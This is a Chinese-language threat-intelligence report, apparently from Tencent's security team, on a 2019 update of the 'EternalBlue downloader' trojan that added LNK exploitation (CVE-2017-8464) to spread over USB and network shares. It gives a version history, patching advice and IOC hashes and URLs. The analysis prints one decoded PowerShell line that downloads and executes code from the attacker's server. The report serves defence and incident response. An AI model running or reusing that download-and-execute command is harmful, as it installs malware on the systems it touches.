永恒之蓝下载器木马再次更新,新增移动盘及网络共享盘传播

2019-07-30 11:41:43
腾讯安全御见威胁情报中心检测到“永恒之蓝下载器”木马于2019年7月19日再次更新,本次更新新增了“震网三代”漏洞CVE-2017-8464利用,更新后的木马会在用户所有的可移动盘以及网络共享盘上创建大量带有漏洞的Lnk文件。

概述

腾讯安全御见威胁情报中心检测到“永恒之蓝下载器”木马于2019719日再次更新,本次更新新增了“震网三代”漏洞CVE-2017-8464利用。

更新后的木马会在用户所有的可移动盘以及网络共享盘上创建大量带有漏洞的Lnk文件,导致其他使用该移动盘或共享盘的机器可能感染木马,容易成企业内部的大面积中招。

更新后“永恒之蓝下载器”木马主要特点:

1、保留了MS17-010永恒之蓝漏洞攻击、SMB爆破攻击,并在在攻击成功的目标机器上植入旧的攻击模块ipc.jsp

2、新增了MsSQL爆破(PE攻击方式曾使用过,无文件攻击首次发现使用)Lnk漏洞CVE-2017-8464利用攻击,在攻击成功后的机器上安装计划任务执行Powershell后门usp.jsp,通过计划任务下载新的攻击模块if.bin

3、安装计划任务后门时采用随机名和随机位置,对老的计划任务Rtsa进行清除。

变种木马攻击流程图如下,其中橙色为新增攻击。

详细分析

本次变种利用Lnk漏洞攻击流程如下:

Usb.jsp通过多层下载得到if.bin,该文件为Powershell脚本,会被安装为计划任务持久化。

if.bin首先检测可移动盘和网络共享盘

然后在目标盘根目录创建Lnk文件和二进制木马文件进行感染


创建的Lnk文件名以大写字母D~K开头,如Dblue3Kblue6,感染效果如下


将特定结构的数据写入Lnk文件,使得在存在漏洞的机器上,只要打开该目录“看一眼”就会触发漏洞执行blue3.bin/blue6.bin

blue3.bin/blue6.bin运行后,在其他机器上执行脚本进行感染

脚本解码后为下载执行最初的Powershell代码usb.jsp

$lf=$env:tmp+'\kdls92jsjqs0.usb';if(!(Test-Path$lf)){IEX(New-ObjectSystem.Net.WebClient).DownloadString('http://t.zer2.com/usb.jsp');new-item $lf-type file}

“永恒之蓝下载器”木马历史变种版本回顾

2019719

新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘。

201943

   开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。

2019328

更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。  

2019314

通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。  

201938

通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与20189月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。  

201936

通过已感染机器后门更新Powershell脚本横向传播模块ipc  

2019225

223日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktazpsexec进行辅助攻击。  

2019223

攻击方法再次更新,新增MsSQL爆破攻击。  

2019220

更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。  

2019210

将攻击模块打包方式改为Pyinstaller.  

2019125

木马在124日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。  

2019124

木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。  

201919

检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。  

20181219

下载之后的木马新增Powershell后门安装。  

20181214

利用驱动人生系列软件升级通道下载,利用永恒之蓝漏洞攻击传播。  

安全建议

1MS010-17 “永恒之蓝”漏洞

服务器暂时关闭不必要的端口(如135139445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

 

下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞

XPWindowsServer2003win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

 

Win7win8.1WindowsServer 2008Windows 10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2CVE-2017-8464 LNK 远程执行代码漏洞

参考微软官方公告安装补丁:

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464

3、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

4、使用杀毒软件拦截可能的病毒攻击;

5、推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

IOCs

Md5

FFEB6DC402F37542889AE2D17B0EDDF2

F1BF55BA24D1A05E80A7CA1D6774AB3D

9ABFFFAF7A4877C9187C3F8A6E59B065

 

URL

http[:]//t.zer2.com/usb.jsp

http[:]//t.zer2.com/v.js

http[:]//t.awcna.com/v.js

http[:]//t.amxny.com/v.js

http[:]//t.zer2.com/v.jsp

http[:]//down.ackng.com/if.bin

http[:]//down.ackng.com/m6.bin

http[:]//down.ackng.com/m3.bin

 

参考链接:

https://www.freebuf.com/column/200241.html

最新资讯